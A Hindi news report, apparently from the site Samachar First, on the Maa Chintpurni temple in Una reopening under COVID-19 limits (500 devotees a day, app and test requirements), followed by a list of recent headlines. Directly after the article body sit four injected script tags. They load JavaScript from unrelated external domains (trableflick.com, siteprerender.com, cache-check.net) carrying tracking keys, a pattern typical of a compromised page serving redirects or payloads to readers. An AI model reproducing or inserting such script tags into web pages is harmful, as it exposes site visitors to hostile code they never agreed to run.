Categories: हिमाचल

ऊनाः मां के जयकारों से गुज़ा विश्व शक्तिपीठ चिंतपूर्णी मंदिर, श्रद्धालुओं ने नतमस्तक होकर मांगी मुरादें

<p>हिमाचल प्रदेश में गुरुवार से सभी धर्मिक शक्तिपीठ श्रद्धालुओं के लिए खोल दिए गए हैं। ऊना में विश्व विख्यात शक्ति पीठ मां चिंतपूर्णी के दरबार में भी कोविड के तहत सावधानी के मद्देनजर दर्शन के लिए कुछ बदलाव किए गए हैं। अब नई प्रणाली के अनुसार एक दिन में केवल 500 श्रद्धालु ही मां के दर्शन कर सकेंगे। मंदिर में दर्शन करने के लिए श्रद्धालुओं को आरोग्य सेतु ऐप डाउनलोड करना अनिवार्य माना गया है। मंदिर में सभी को मेडिकल जांच के बाद ही दर्शन की अनुमति दी जा रही है। जबकि कोविड के लक्षण पाए जाने पर उन्हें अस्पताल या कोविड केयर सेंटर में आइसोलेट किया जाएगा।</p>

<p>बाहरी प्रदेशों से आने वाले श्रद्धालुओं के लिए किसी होटल में दो दिन की बुकिंग के साथ ही उनकी कोविड-19 टेस्ट रिपोर्ट निगेटिव आने पर ही मंदिर के अंदर जाने की अनुमति दी जा रही है। आज मंदिर खुलने के साथ ही मंदिर प्रशासन भी मौके पर मजूद रहा। मंदिर में माता की पिंडी के पास पुजारी सेफ्टी शीट के साथ बैठे दिखाई दिए मंदिर खुलने का आज पहल दिन था जिस कारण मंदिर में श्रद्धालुओं की आबक कम ही दिखाई दी। मंदिर अधिकारी की माने तो कोविड नियमों की पालना करते हुए दर्शन करवाए जा रहे है और श्रद्धालुओं की सुरक्षा का भी ख्याल रखा जा रहा है</p>

<p>मंदिर खुलने से दुकानदार और कारोबारी खुश नजर आ रहे हैं। लगभग 6 महीने के लंबे समय के बाद मां चिंतपूर्णी के दर्शन कर श्रद्धालुओं ने प्रसन्नता और संतुष्टि व्यक्त की। श्रद्धालु दर्शन कर भावविभोर नज़र आए और मंदिर प्रशासन के इंतज़ाम से खुश दिखाई दिए। जिला प्रशासन द्वारा दिये गए दिशा निर्देश को लेकर पुजारी बर्ग और दुकानदार भी काफी खुश&nbsp; दिखे और उन्होंने भी उचित दिशा निर्देशों का पालन करने की बात कही है और मंदिर खुलने से फिर से करोवार पटरी पर आने की उम्मीद जताई है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1599735048316″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

लोक सभाचुनाव के दृष्टिगत राजनीतिक दलों के प्रतिनिधियों के साथ बैठक आयोजित

मुख्य निर्वाचन अधिकारी (सीईओ) मनीष गर्ग ने राजनीतिक दलों के प्रतिनिधियों की एक बैठक की…

1 min ago

राष्ट्रपति ने राज्यपाल को डाक्टरेट की मानद उपाधि प्रदान की

भारत की राष्ट्रपति श्रीमती द्रौपदी मुर्मू ने आज  धर्मशाला में हिमाचल प्रदेश केंद्रीय विश्वविद्यालय के…

15 hours ago

भारत के राष्ट्रपति ने हिमाचल प्रदेश केंद्रीय विश्वविद्यालय के 7वें दीक्षांत समारोह में भाग लिया

भारत की राष्ट्रपति श्रीमती द्रौपदी मुर्मू ने आज (6 मई, 2024) धर्मशाला में हिमाचल प्रदेश…

15 hours ago

लाहौल स्पीति में नगदी फसलों की बिजाई का कार्य आरंभ

केलांग  6 मई: कृषि अधिकारी खंड स्तर पर किसानों को गुणवत्तायुक्त बीज उर्वरक , कृषि…

16 hours ago

बिकाऊ विधायक जनता के सबसे बड़े गुनहगार : मुख्यमंत्री

नादौन: मुख्यमंत्री ठाकुर सुखविंदर सिंह सूक्खू ने कहा कि बिकाऊ विधायक जनता के सबसे बड़े…

16 hours ago

सभी क्षेत्रों में चाहे वह रेलवे, राजमार्ग, स्वास्थ्य सेवा, शिक्षा आदि हो पीएम मोदी के काम से परिवर्तन साफ दिखता है : राजीव

चंबा/धर्मशाला: भाजपा प्रत्याशी एवं प्रदेश उपाध्यक्ष डॉ राजीव भारद्वाज ने कहा की प्रधानमंत्री नरेंद्र मोदी…

16 hours ago